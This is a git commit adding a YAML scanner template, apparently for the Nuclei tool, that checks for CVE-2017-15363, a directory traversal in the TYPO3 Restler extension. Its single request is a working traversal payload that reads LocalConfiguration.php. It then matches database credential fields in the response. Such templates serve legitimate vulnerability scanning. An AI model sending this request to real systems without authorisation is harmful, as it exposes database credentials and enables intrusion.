Create CVE-2017-15363.yaml

2021-11-09 07:35:51 +09:00 · 2021-11-09 07:35:51 +09:00 · 285c2ca856
parent 31ec5eaaf8
commit 285c2ca856
1 changed files with 36 additions and 0 deletions
--- a/CVE-2017-15363.yaml
+++ b/CVE-2017-15363.yaml
@ -0,0 +1,36 @@
+id: CVE-2017-15363
+info:
+  name: Typo3 Restler Extension - Local File Disclosure
+  author: 0x_Akoko
+  severity: high
+  description: Directory traversal vulnerability in public/examples/resources/getsource.php in Luracast Restler through 3.0.0, as used in the restler extension before 1.7.1 for TYPO3, allows remote attackers to read arbitrary files via the file parameter.
+  reference:
+    - https://www.exploit-db.com/exploits/42985
+    - https://www.cvedetails.com/cve/CVE-2017-15363
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2017-15363
+    cwe-id: CWE-98
+  tags: cve,cve2017,restler,lfi
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/typo3conf/ext/restler/vendor/luracast/restler/public/examples/resources/getsource.php?file=../../../../../../../LocalConfiguration.php"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "database"
+          - "host"
+          - "password"
+          - "port"
+          - "username"
+        part: body
+        condition: and
+
+      - type: status
+        status:
+          - 200